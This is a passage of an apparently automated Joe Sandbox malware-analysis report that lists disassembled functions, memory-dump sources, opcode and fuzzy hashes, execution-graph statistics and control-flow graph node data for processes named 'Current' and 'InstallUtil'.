                                                        Function 05842DC0 Relevance: .0, Instructions: 19COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2287616373.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_5840000_Current.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b0723a2ef6f0c96cdb8b81f87a172df89e00da0f796d75c7b428bd7ad8d6d4f8
                                                        • Instruction ID: 068466e3e14f1b256767c414ee8700336382a573ddbe37757c1ecf5e518be7ac
                                                        • Opcode Fuzzy Hash: b0723a2ef6f0c96cdb8b81f87a172df89e00da0f796d75c7b428bd7ad8d6d4f8
                                                        • Instruction Fuzzy Hash: FDE0EC3890A10CEBCB04DF94D541AACBBB5EB85314F1091999C0A67341C6329E82DB81
                                                        Function 058434D8 Relevance: .0, Instructions: 19COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2287616373.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_5840000_Current.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b0723a2ef6f0c96cdb8b81f87a172df89e00da0f796d75c7b428bd7ad8d6d4f8
                                                        • Instruction ID: b2e32e25afae2158a6b8fe1f373627e62f7e372e3c4a7f0719a7710dc8f74df3
                                                        • Opcode Fuzzy Hash: b0723a2ef6f0c96cdb8b81f87a172df89e00da0f796d75c7b428bd7ad8d6d4f8
                                                        • Instruction Fuzzy Hash: BDE0123490A10CDBC704DF98D5429ACBBB9FB45314F1495DDDC0957341CA329E82DF85
                                                        Function 05846C08 Relevance: .0, Instructions: 19COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2287616373.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_5840000_Current.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b0723a2ef6f0c96cdb8b81f87a172df89e00da0f796d75c7b428bd7ad8d6d4f8
                                                        • Instruction ID: 6dbc7e173cca7610c8b3dae9d1f67df9618198c5eff8a560633b6bd6dc6d993f
                                                        • Opcode Fuzzy Hash: b0723a2ef6f0c96cdb8b81f87a172df89e00da0f796d75c7b428bd7ad8d6d4f8
                                                        • Instruction Fuzzy Hash: 3AE01234D0A10CDBC704DF94E5419ADBFB9FB46314F10959DDC0957341DA329E52DB85
                                                        Function 0584CFC8 Relevance: .0, Instructions: 19COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2287616373.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_5840000_Current.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b0723a2ef6f0c96cdb8b81f87a172df89e00da0f796d75c7b428bd7ad8d6d4f8
                                                        • Instruction ID: 19a1ef651b270c5a59e3184eabe64f0bb243a6375e3c9499736e48abe317c5ba
                                                        • Opcode Fuzzy Hash: b0723a2ef6f0c96cdb8b81f87a172df89e00da0f796d75c7b428bd7ad8d6d4f8
                                                        • Instruction Fuzzy Hash: 97E0123490A10CDBC704DFD4D5419ACBBB9FB45315F20919DDC0997341DA76AE42DB81
                                                        Function 05847738 Relevance: .0, Instructions: 19COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2287616373.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_5840000_Current.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b0723a2ef6f0c96cdb8b81f87a172df89e00da0f796d75c7b428bd7ad8d6d4f8
                                                        • Instruction ID: 6b0b083ed73afb50b547cb37fed033b0eae5b88b562f1b18210990e9259e43c8
                                                        • Opcode Fuzzy Hash: b0723a2ef6f0c96cdb8b81f87a172df89e00da0f796d75c7b428bd7ad8d6d4f8
                                                        • Instruction Fuzzy Hash: 44E01274A0A10CDBCB04DFA4D6419ADFBB9FB45314F5091ADDC09A7341DB32AE42DB81
                                                        Function 0584C9E0 Relevance: .0, Instructions: 19COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2287616373.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_5840000_Current.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b0723a2ef6f0c96cdb8b81f87a172df89e00da0f796d75c7b428bd7ad8d6d4f8
                                                        • Instruction ID: ffa303e4d38fc89d954424d9fe8388176f30c1ce76bae5911017f271397225ce
                                                        • Opcode Fuzzy Hash: b0723a2ef6f0c96cdb8b81f87a172df89e00da0f796d75c7b428bd7ad8d6d4f8
                                                        • Instruction Fuzzy Hash: 56E0123490A10CEBC704DF98D5419ACBFB9FB45314F1491A9DC4967341CA329E82DB81
                                                        Function 05840908 Relevance: .0, Instructions: 19COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2287616373.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_5840000_Current.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b0723a2ef6f0c96cdb8b81f87a172df89e00da0f796d75c7b428bd7ad8d6d4f8
                                                        • Instruction ID: 804301a09ca0e26b19131272645fbf0e16f8cf526aa404a3ef71f3fc6922b520
                                                        • Opcode Fuzzy Hash: b0723a2ef6f0c96cdb8b81f87a172df89e00da0f796d75c7b428bd7ad8d6d4f8
                                                        • Instruction Fuzzy Hash: EFE0C23490A10CEBC708DF94E5449ADFFB8FB45304F10949CCC0857341CA329E42DB80
                                                        Function 058470D8 Relevance: .0, Instructions: 19COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2287616373.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_5840000_Current.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 82f248e564a14d31b1023d72fb4fefcd69c1bf299da585a64d2167628a9ded14
                                                        • Instruction ID: 30ea883bb9d3023aa3b4fc979e738dd8e929a9635860f39d0a78604521b17741
                                                        • Opcode Fuzzy Hash: 82f248e564a14d31b1023d72fb4fefcd69c1bf299da585a64d2167628a9ded14
                                                        • Instruction Fuzzy Hash: F2E0C770802208EBC780EFF8CA00A9EBBF8FB84300F0044A5884183190EE724A00ABA2
                                                        Function 05841870 Relevance: .0, Instructions: 19COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2287616373.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_5840000_Current.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b0723a2ef6f0c96cdb8b81f87a172df89e00da0f796d75c7b428bd7ad8d6d4f8
                                                        • Instruction ID: 7bd1bcdd4a2570188819112135922fa457a6115d789518ed34ec96922e08c082
                                                        • Opcode Fuzzy Hash: b0723a2ef6f0c96cdb8b81f87a172df89e00da0f796d75c7b428bd7ad8d6d4f8
                                                        • Instruction Fuzzy Hash: 2FE0123490A10CDBC708DFD4D9459ACBBB5FB45314F109199DC0957341C6329E82DF81
                                                        Function 0584DB38 Relevance: .0, Instructions: 19COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2287616373.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_5840000_Current.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b0723a2ef6f0c96cdb8b81f87a172df89e00da0f796d75c7b428bd7ad8d6d4f8
                                                        • Instruction ID: d9cd80c69cccc6952416ea15d5ee59058134437f076729fd5e39d2283ac46cf9
                                                        • Opcode Fuzzy Hash: b0723a2ef6f0c96cdb8b81f87a172df89e00da0f796d75c7b428bd7ad8d6d4f8
                                                        • Instruction Fuzzy Hash: 72E0EC34A0A10CDBCB04DF94D5959ACFBB9EB45319F1091A99C0957341CA329E42DB81
                                                        Function 05840258 Relevance: .0, Instructions: 19COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2287616373.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_5840000_Current.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b0723a2ef6f0c96cdb8b81f87a172df89e00da0f796d75c7b428bd7ad8d6d4f8
                                                        • Instruction ID: 32c9b18a509d28f18ca627f884caf8d939506d6b59503a5be3f6c5786a444143
                                                        • Opcode Fuzzy Hash: b0723a2ef6f0c96cdb8b81f87a172df89e00da0f796d75c7b428bd7ad8d6d4f8
                                                        • Instruction Fuzzy Hash: BDE0C23490A10CEBCB04DFD4D5449ADFBB9FB45304F10809CCC0857382CA32AE42DB80
                                                        Function 05842260 Relevance: .0, Instructions: 19COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2287616373.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_5840000_Current.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b0723a2ef6f0c96cdb8b81f87a172df89e00da0f796d75c7b428bd7ad8d6d4f8
                                                        • Instruction ID: 722ed9dedae4e18acdc4e46a2c84bc923292b642b7e668b2e4a391665a04c3a1
                                                        • Opcode Fuzzy Hash: b0723a2ef6f0c96cdb8b81f87a172df89e00da0f796d75c7b428bd7ad8d6d4f8
                                                        • Instruction Fuzzy Hash: 9FE0EC3890E10CEBCB04DF94D541AACFBB5EB85314F1091999C4957351C6329E42DB81
                                                        Function 05847DF0 Relevance: .0, Instructions: 18COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2287616373.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_5840000_Current.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 72ecf4caf2b076cbbce2dfbd41984fe1d28d05f2427a7db96c7167f06a1da286
                                                        • Instruction ID: 005e7db649420f5480026f0387d16a04056e2524cbdcb9c0a570bd7e8129bb9f
                                                        • Opcode Fuzzy Hash: 72ecf4caf2b076cbbce2dfbd41984fe1d28d05f2427a7db96c7167f06a1da286
                                                        • Instruction Fuzzy Hash: 6BE08C3090A10CDBC718DBA8C5406ACBBB8EB05204F148199CC8893341E7329E42DB90
                                                        Function 028D92F0 Relevance: .0, Instructions: 17COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2264931454.00000000028D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_28d0000_Current.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 092739af420062b943f21dbd269d746cee21446c7608eae37c3ca7f138a70c46
                                                        • Instruction ID: add1e6f25c1df833e00428fbec41fdbac1ac416d01128d87dd0b80e56daab0c3
                                                        • Opcode Fuzzy Hash: 092739af420062b943f21dbd269d746cee21446c7608eae37c3ca7f138a70c46
                                                        • Instruction Fuzzy Hash: 82D09E8948E3C71EC34302256DF15453F30291311C71A01EBC1A1DF697D10949CEC3A3
                                                        Function 028D5320 Relevance: .0, Instructions: 16COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2264931454.00000000028D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_28d0000_Current.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 82b036bda81206eeba1887d6b333f04b3d097f8011a7dbf8f95d42e1fa495502
                                                        • Instruction ID: ce3ff802418638d1066e5cf009a382e638b16c602ae3fbc74a6688ff5491fbe7
                                                        • Opcode Fuzzy Hash: 82b036bda81206eeba1887d6b333f04b3d097f8011a7dbf8f95d42e1fa495502
                                                        • Instruction Fuzzy Hash: A0D0127090120CEFCB14EFA4ED4155DB7B5EB45204B50559ED808D7240EA316F00AB41
                                                        Function 0584A125 Relevance: .0, Instructions: 15COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2287616373.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_5840000_Current.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: cc108f422560a09f3bac18b7f84ee95ae255cfec70e9e422fbce08eec62d0fe6
                                                        • Instruction ID: 83331de6287ef5e6ea629b253c5ad125e9b1c4634e955dc146fc36c072c04c9a
                                                        • Opcode Fuzzy Hash: cc108f422560a09f3bac18b7f84ee95ae255cfec70e9e422fbce08eec62d0fe6
                                                        • Instruction Fuzzy Hash: 25E09238A04228CFDB21CF20C944B99BBB1FB49314F0485DA884DA7291D3759F86CF01
                                                        Function 028D0B0A Relevance: .0, Instructions: 13COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2264931454.00000000028D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_28d0000_Current.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 8d3a74531c7a76fc6d45b0f115425718f371497fbe76dbbf4e9416a8c7b7878a
                                                        • Instruction ID: 232ff126c6f2b5550e54db8eb521296be90375d20c1f7e8825c15ba9c7ed72c8
                                                        • Opcode Fuzzy Hash: 8d3a74531c7a76fc6d45b0f115425718f371497fbe76dbbf4e9416a8c7b7878a
                                                        • Instruction Fuzzy Hash: A4D0A73C941114A7DB18AF20DC0576A7330EF41363F551924CC4BD7541DB30AD0F9AC6
                                                        Function 0714820E Relevance: .0, Instructions: 12COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2290686402.0000000007140000.00000040.00000800.00020000.00000000.sdmp, Offset: 07140000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_7140000_Current.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 991cc2f51a3605247e941253d86e2a976f1fa53b7cc8360984ea3f601a9a032a
                                                        • Instruction ID: b994f61b4aebf8734d3036d2ac4c2a81817c99dfe03f151dc76dc7e5a6a55128
                                                        • Opcode Fuzzy Hash: 991cc2f51a3605247e941253d86e2a976f1fa53b7cc8360984ea3f601a9a032a
                                                        • Instruction Fuzzy Hash: 3CD05E34618004CFC3159F24C85DBAD7AB1DF8E309F2140D5954E9B686D7B98AC58B11
                                                        Function 0715E438 Relevance: .0, Instructions: 12COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2290686402.0000000007140000.00000040.00000800.00020000.00000000.sdmp, Offset: 07140000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_7140000_Current.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 31f9e249e4096e4a9675a6f5824db244abd5661a065b9754b54efb7ac098f9b2
                                                        • Instruction ID: 62d636e69ebddbc86797f95a9a81405a07fc29ad18640665039d9c093b46dd41
                                                        • Opcode Fuzzy Hash: 31f9e249e4096e4a9675a6f5824db244abd5661a065b9754b54efb7ac098f9b2
                                                        • Instruction Fuzzy Hash: 09C02BB015B305C2C31C17A4A10C37572DCD303325F0E2C005E1C40490C77140C8E252
                                                        Function 028D1FE9 Relevance: .0, Instructions: 11COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2264931454.00000000028D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_28d0000_Current.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 25e15a36d6146d662e945542f93524b431e8753143d9e8d581ffef472041360c
                                                        • Instruction ID: e2166f8bd1bb20a72fd2418d4b5a68f760087ae037e778c70abfc92b4fa74601
                                                        • Opcode Fuzzy Hash: 25e15a36d6146d662e945542f93524b431e8753143d9e8d581ffef472041360c
                                                        • Instruction Fuzzy Hash: C3D09278E0510DAFDB08DFA1D891BEDFBB1BF48304F50441AE822A7291CA702944CF51
                                                        Function 028D2319 Relevance: .0, Instructions: 10COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2264931454.00000000028D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_28d0000_Current.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e94407e892f5a26c0f8ed10da9eb0a99c2490e05726caef261f6860dc92efb87
                                                        • Instruction ID: cd499418f91f27c62989aefc3a35600d4748d4e3442831f814dbde5037ec45a2
                                                        • Opcode Fuzzy Hash: e94407e892f5a26c0f8ed10da9eb0a99c2490e05726caef261f6860dc92efb87
                                                        • Instruction Fuzzy Hash: EFD0C9B490010A8BCF19EFA4EA417DDB771EF40308F101518E0056B646CB343E06DB55
                                                        Function 028D08B0 Relevance: .0, Instructions: 5COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2264931454.00000000028D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_28d0000_Current.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 13464e54e7548b1328d5774c475133ef73534758c17a8289e9c24a52819866c5
                                                        • Instruction ID: e16c32d83fd537db1aabbdc7d81248a35546b27255db876962764bd25f184f2a
                                                        • Opcode Fuzzy Hash: 13464e54e7548b1328d5774c475133ef73534758c17a8289e9c24a52819866c5
                                                        • Instruction Fuzzy Hash: F290023104660CAB455027A57C09559F76C9549535BC04051ED4D415065A7AA4114699
                                                        Function 028D5B2C Relevance: .0, Instructions: 4COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2264931454.00000000028D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_28d0000_Current.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 851d11952a9eaf69a429d4326d4d9fb9181d46be4020aa3f18be1ef8f618bb55
                                                        • Instruction ID: c4ad1a356d018e22591d569805b358632c3af084a9e663bc0908807ee386f1d1
                                                        • Opcode Fuzzy Hash: 851d11952a9eaf69a429d4326d4d9fb9181d46be4020aa3f18be1ef8f618bb55
                                                        • Instruction Fuzzy Hash: 1AA00178905159AFD7608AA8E488259BAA0E708219F50502BA85AD6245DA3944588B01

                                                        Execution Graph

                                                        Execution Coverage:16.2%
                                                        Dynamic/Decrypted Code Coverage:100%
                                                        Signature Coverage:6.5%
                                                        Total number of Nodes:62
                                                        Total number of Limit Nodes:7
                                                        execution_graph 25325 aaced8 25326 aacee4 25325->25326 25336 5f511c0 25326->25336 25343 5f511b0 25326->25343 25327 aacf98 25350 5f5d7a8 25327->25350 25354 5f5d798 25327->25354 25328 aacfd7 25358 5f88608 25328->25358 25365 5f885f8 25328->25365 25329 aad0b7 25337 5f511e2 25336->25337 25338 5f512ae 25337->25338 25372 5f58174 25337->25372 25378 5f57b60 25337->25378 25384 5f57b70 25337->25384 25388 5f57d90 25337->25388 25338->25327 25344 5f511c0 25343->25344 25345 5f512ae 25344->25345 25346 5f58174 2 API calls 25344->25346 25347 5f57d90 2 API calls 25344->25347 25348 5f57b70 LdrInitializeThunk 25344->25348 25349 5f57b60 2 API calls 25344->25349 25345->25327 25346->25345 25347->25345 25348->25345 25349->25345 25351 5f5d7ca 25350->25351 25352 5f57d90 2 API calls 25351->25352 25353 5f5d894 25351->25353 25352->25353 25353->25328 25355 5f5d7ca 25354->25355 25356 5f57d90 2 API calls 25355->25356 25357 5f5d894 25355->25357 25356->25357 25357->25328 25359 5f8862a 25358->25359 25360 5f8873c 25359->25360 25361 5f58174 2 API calls 25359->25361 25362 5f57d90 2 API calls 25359->25362 25363 5f57b70 LdrInitializeThunk 25359->25363 25364 5f57b60 2 API calls 25359->25364 25360->25329 25361->25360 25362->25360 25363->25360 25364->25360 25366 5f8862a 25365->25366 25367 5f8873c 25366->25367 25368 5f58174 2 API calls 25366->25368 25369 5f57d90 2 API calls 25366->25369 25370 5f57b70 LdrInitializeThunk 25366->25370 25371 5f57b60 2 API calls 25366->25371 25367->25329 25368->25367 25369->25367 25370->25367 25371->25367 25374 5f5802b 25372->25374 25373 5f5816c LdrInitializeThunk 25376 5f582c9 25373->25376 25374->25373 25377 5f57b70 LdrInitializeThunk 25374->25377 25376->25338 25377->25374 25379 5f57b82 25378->25379 25380 5f57b87 25378->25380 25379->25338 25380->25379 25381 5f5816c LdrInitializeThunk 25380->25381 25383 5f57b70 LdrInitializeThunk 25380->25383 25381->25379 25383->25380 25385 5f57b82 25384->25385 25387 5f57b87 25384->25387 25385->25338 25386 5f582b1 LdrInitializeThunk 25386->25385 25387->25385 25387->25386 25392 5f57dc1 25388->25392 25389 5f57f21 25389->25338 25390 5f5816c LdrInitializeThunk 25390->25389 25392->25389 25392->25390 25393 5f57b70 LdrInitializeThunk 25392->25393 25393->25392 25394 5f58460 25395 5f58467 25394->25395 25397 5f5846d 25394->25397 25396 5f57b70 LdrInitializeThunk 25395->25396 25395->25397 25399 5f587ee 25395->25399 25396->25399 25398 5f57b70 LdrInitializeThunk 25398->25399 25399->25397 25399->25398

                                                        Executed Functions

                                                        Function 00AA6730 Relevance: 6.7, Strings: 5, Instructions: 471COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 146 aa6730-aa6766 147 aa676e-aa6774 146->147 278 aa6768 call aa6108 146->278 279 aa6768 call aa6730 146->279 280 aa6768 call aa6880 146->280 148 aa6776-aa677a 147->148 149 aa67c4-aa67c8 147->149 150 aa6789-aa6790 148->150 151 aa677c-aa6781 148->151 152 aa67ca-aa67d9 149->152 153 aa67df-aa67f3 149->153 154 aa6866-aa68a3 150->154 155 aa6796-aa679d 150->155 151->150 156 aa67db-aa67dd 152->156 157 aa6805-aa680f 152->157 158 aa67fb-aa6802 153->158 274 aa67f5 call aa97e8 153->274 275 aa67f5 call aa9848 153->275 276 aa67f5 call aa9530 153->276 168 aa68ae-aa68ce 154->168 169 aa68a5-aa68ab 154->169 155->149 159 aa679f-aa67a3 155->159 156->158 160 aa6819-aa681d 157->160 161 aa6811-aa6817 157->161 162 aa67b2-aa67b9 159->162 163 aa67a5-aa67aa 159->163 165 aa6825-aa685f 160->165 166 aa681f 160->166 161->165 162->154 167 aa67bf-aa67c2 162->167 163->162 165->154 166->165 167->158 174 aa68d0 168->174 175 aa68d5-aa68dc 168->175 169->168 177 aa6c64-aa6c6d 174->177 178 aa68de-aa68e9 175->178 179 aa68ef-aa6902 178->179 180 aa6c75-aa6cb1 178->180 185 aa6918-aa6933 179->185 186 aa6904-aa6912 179->186 189 aa6cba-aa6cbe 180->189 190 aa6cb3-aa6cb8 180->190 194 aa6957-aa695a 185->194 195 aa6935-aa693b 185->195 186->185 192 aa6bec-aa6bf3 186->192 193 aa6cc4-aa6cc5 189->193 190->193 192->177 200 aa6bf5-aa6bf7 192->200 196 aa6960-aa6963 194->196 197 aa6ab4-aa6aba 194->197 198 aa693d 195->198 199 aa6944-aa6947 195->199 196->197 207 aa6969-aa696f 196->207 205 aa6ac0-aa6ac5 197->205 206 aa6ba6-aa6ba9 197->206 198->197 198->199 201 aa697a-aa6980 198->201 198->206 199->201 202 aa6949-aa694c 199->202 203 aa6bf9-aa6bfe 200->203 204 aa6c06-aa6c0c 200->204 212 aa6982-aa6984 201->212 213 aa6986-aa6988 201->213 208 aa6952 202->208 209 aa69e6-aa69ec 202->209 203->204 204->180 210 aa6c0e-aa6c13 204->210 205->206 214 aa6baf-aa6bb5 206->214 215 aa6c70 206->215 207->197 211 aa6975 207->211 208->206 209->206 218 aa69f2-aa69f8 209->218 216 aa6c58-aa6c5b 210->216 217 aa6c15-aa6c1a 210->217 211->206 219 aa6992-aa699b 212->219 213->219 220 aa6bda-aa6bde 214->220 221 aa6bb7-aa6bbf 214->221 215->180 216->215 222 aa6c5d-aa6c62 216->222 217->215 223 aa6c1c 217->223 224 aa69fa-aa69fc 218->224 225 aa69fe-aa6a00 218->225 227 aa69ae-aa69d6 219->227 228 aa699d-aa69a8 219->228 220->192 229 aa6be0-aa6be6 220->229 221->180 226 aa6bc5-aa6bd4 221->226 222->177 222->200 230 aa6c23-aa6c28 223->230 231 aa6a0a-aa6a21 224->231 225->231 226->185 226->220 249 aa6aca-aa6b00 227->249 250 aa69dc-aa69e1 227->250 228->206 228->227 229->178 229->192 233 aa6c4a-aa6c4c 230->233 234 aa6c2a-aa6c2c 230->234 243 aa6a4c-aa6a73 231->243 244 aa6a23-aa6a3c 231->244 233->215 240 aa6c4e-aa6c51 233->240 237 aa6c3b-aa6c41 234->237 238 aa6c2e-aa6c33 234->238 237->180 242 aa6c43-aa6c48 237->242 238->237 240->216 242->233 245 aa6c1e-aa6c21 242->245 243->215 255 aa6a79-aa6a7c 243->255 244->249 253 aa6a42-aa6a47 244->253 245->215 245->230 256 aa6b0d-aa6b15 249->256 257 aa6b02-aa6b06 249->257 250->249 253->249 255->215 258 aa6a82-aa6aab 255->258 256->215 261 aa6b1b-aa6b20 256->261 259 aa6b08-aa6b0b 257->259 260 aa6b25-aa6b29 257->260 258->249 273 aa6aad-aa6ab2 258->273 259->256 259->260 262 aa6b2b-aa6b31 260->262 263 aa6b48-aa6b4c 260->263 261->206 262->263 267 aa6b33-aa6b3b 262->267 265 aa6b4e-aa6b54 263->265 266 aa6b56-aa6b75 call aa6e58 263->266 265->266 268 aa6b7b-aa6b7f 265->268 266->268 267->215 269 aa6b41-aa6b46 267->269 268->206 271 aa6b81-aa6b9d 268->271 269->206 271->206 273->249 274->158 275->158 276->158 278->147 279->147 280->147
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.4482571584.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_aa0000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: (osq$(osq$(osq$,wq$,wq
                                                        • API String ID: 0-1903262254
                                                        • Opcode ID: 7f44b7e01550619a51911a8850b54d84d32831f7bc747340983cd3514ea96dd8
                                                        • Instruction ID: b2ec29b9013e73cfca83cfd6127043d518a23a67677c7be78c54b953e23c06e6
                                                        • Opcode Fuzzy Hash: 7f44b7e01550619a51911a8850b54d84d32831f7bc747340983cd3514ea96dd8
                                                        • Instruction Fuzzy Hash: A2126D71A00219DFCB15CFA9C984AAEBBB2FF8A314F198069E455EB2A1D734DD41CF50
                                                        Function 00AAB328 Relevance: 6.6, Strings: 5, Instructions: 363COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
